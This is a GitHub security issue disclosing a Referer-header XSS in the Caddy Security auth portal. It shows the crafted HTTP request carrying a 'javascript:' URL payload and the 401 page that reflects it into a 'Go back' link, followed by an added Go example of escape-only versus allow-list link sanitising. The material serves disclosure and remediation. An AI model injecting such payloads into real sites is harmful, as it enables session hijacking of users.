Referer-Based Header XSS #267

Open
ahpaleus opened this issue Sep 19, 2023 · 0 comments
ahpaleus commented Sep 19, 2023

Severity: Medium

An XSS vulnerability can be triggered by rewriting the Referer header. Although the Referer header is sanitized by escaping some characters that can allow XSS (e.g., [&], [<], [>], ["], [']), it does not account for the attack based on the JavaScript URL scheme (e.g., javascript:alert(document.domain)// payload). Exploiting this vulnerability may not be trivial, but it could lead to the execution of malicious scripts in the context of the target user’s browser, compromising user sessions.

GET /oauth2/google?state=AA HTTP/2
Host: portal.caddysecurity.network
Cookie: AUTHP_SESSION_ID=bgSUVN2uK7z8rCERZMiAnPPxZ9DOmfl5Hn7hCwZRTkc5
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 stcl6szi3
Origin: https://stcl6szi3.com
Referer: javascript:alert(document.domain)//X

HTTP/2 401 Unauthorized
Cache-Control: no-store
Content-Type: text/html
Pragma: no-cache
Server: Fly/a0b91024 (2023-06-13)
Date: Wed, 19 Jul 2023 08:54:55 GMT
Content-Length: 2008
Via: 2 fly.io
Fly-Request-Id: 01H5PNR1Q9D43TKDNDXSRR2MNS-waw

<!DOCTYPE html>
<html lang="en" class="h-full bg-blue-100">
  <head>
    <title>Authentication Portal - Unauthorized</title>
    <!-- Required meta tags -->
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <meta name="description" content="Performs user authentication." />
    <meta name="author" content="Paul Greenberg github.com/greenpau" />
    <link rel="shortcut icon" href="/assets/images/favicon.png" type="image/png" />
    <link rel="icon" href="/assets/images/favicon.png" type="image/png" />
    <link rel="stylesheet" href="/assets/google-webfonts/roboto.css" />
    <link rel="stylesheet" href="/assets/line-awesome/line-awesome.css" />
    <link rel="stylesheet" href="/assets/css/generic.css" />
    
  </head>

  <body class="h-full">
    <div class="app-page">
      <div class="app-content md:max-w-2xl lg:max-w-2xl">
        <div class="bg-white py-8 px-4 shadow-lg sm:rounded-lg sm:px-10">
          <div class="bg-white min-h-full px-4 py-16 sm:px-6 sm:py-24 md:grid md:place-items-center lg:px-8">
            <div class="max-w-max mx-auto">
              <main class="sm:flex">
                
                  <img class="logo-img" src="/assets/images/logo.svg" alt="Authentication Portal" />
                
                <div class="sm:ml-6">
                  <div class="app-gen-banner-box">
                    <h1 class="app-gen-banner-header">Unauthorized</h1>
                    <p class="app-gen-banner-message"><no value></p>
                  </div>
                  
                    <div class="app-gen-btn-box">
                      <a href="javascript:alert(document.domain)//X" class="app-gen-btn-txt"> Go back </a>
                    </div>
                  
                </div>
              </main>
            </div>
          </div>
        </div>
      </div>
    </div>
    <!-- JavaScript -->
    <script src="/assets/js/generic.js"></script>
    
  </body>
</html>

The mitigation for this issue is identical to issue #264.

More information about our Caddy Security public disclosure:
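The report above shows why character escaping alone does not protect an `href` attribute: the payload `javascript:alert(document.domain)//X` contains none of `& < > " '`, so it survives escaping unchanged and the browser executes it when the "Go back" link is clicked. The following Go program is an added example, not code from the caddy-security project or from the reporter; the function names (`escapeOnly`, `SafeBackLink`, `RenderBackButton`) and the hostname `portal.caddysecurity.network` used as the allowed origin are assumptions for illustration. It places an escape-only sanitizer beside a hardened one that parses the Referer value, admits only same-origin `http`/`https` URLs or same-origin relative paths, and otherwise falls back to a fixed safe link.

```go
package main

import (
	"fmt"
	"html"
	"net/url"
	"strings"
)

// escapeOnly reproduces the weakness described in the report: HTML
// metacharacters are escaped, but the URL scheme is never inspected.
// A javascript: URL has nothing to escape and passes through untouched.
// (Hypothetical reconstruction for illustration, not the project's code.)
func escapeOnly(referer string) string {
	return html.EscapeString(referer)
}

// SafeBackLink returns a value that is safe to place in an href attribute.
// Only two shapes are accepted:
//   - a same-origin relative path ("/login?next=...", but not "//host/...")
//   - an absolute http/https URL whose host equals allowedHost
// Anything else (javascript:, data:, vbscript:, foreign hosts, unparsable
// input) yields fallback. The accepted value is still HTML-escaped so a
// "&" in a query string cannot break out of the attribute.
func SafeBackLink(referer, allowedHost, fallback string) string {
	u, err := url.Parse(strings.TrimSpace(referer))
	if err != nil {
		return fallback // control characters, bad percent-encoding, etc.
	}
	switch {
	case u.Scheme == "" && u.Host == "" &&
		strings.HasPrefix(u.Path, "/") && !strings.HasPrefix(u.Path, "//"):
		// Relative path on the same origin.
		return html.EscapeString(u.String())
	case (u.Scheme == "http" || u.Scheme == "https") &&
		strings.EqualFold(u.Hostname(), allowedHost):
		// Absolute URL, but only back to the portal itself.
		return html.EscapeString(u.String())
	default:
		return fallback
	}
}

// RenderBackButton builds the "Go back" anchor from the 401 page using the
// hardened link function; "/" is the safe fallback.
func RenderBackButton(referer, allowedHost string) string {
	return fmt.Sprintf(`<a href="%s" class="app-gen-btn-txt"> Go back </a>`,
		SafeBackLink(referer, allowedHost, "/"))
}

func main() {
	const host = "portal.caddysecurity.network"
	payload := "javascript:alert(document.domain)//X" // payload from the report

	fmt.Println("escape-only:", escapeOnly(payload)) // unchanged, still executable
	fmt.Println("hardened:   ", RenderBackButton(payload, host))
	fmt.Println("hardened:   ", RenderBackButton("//evil.example/x", host))
	fmt.Println("hardened:   ", RenderBackButton("https://"+host+"/login", host))
	fmt.Println("hardened:   ", RenderBackButton("/apps/profile?x=1&y=2", host))
}
```

The allow-list on scheme and host is the part that matters; blocking `javascript:` by string match alone is brittle because case variants and leading whitespace or control characters are normalised differently by parsers and browsers. If the page is rendered with Go's `html/template` rather than `text/template`, the contextual escaper will additionally replace an unsafe-scheme value in an `href` with `#ZgotmplZ`, but that is a safety net, not a substitute for validating the value before it reaches the template.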
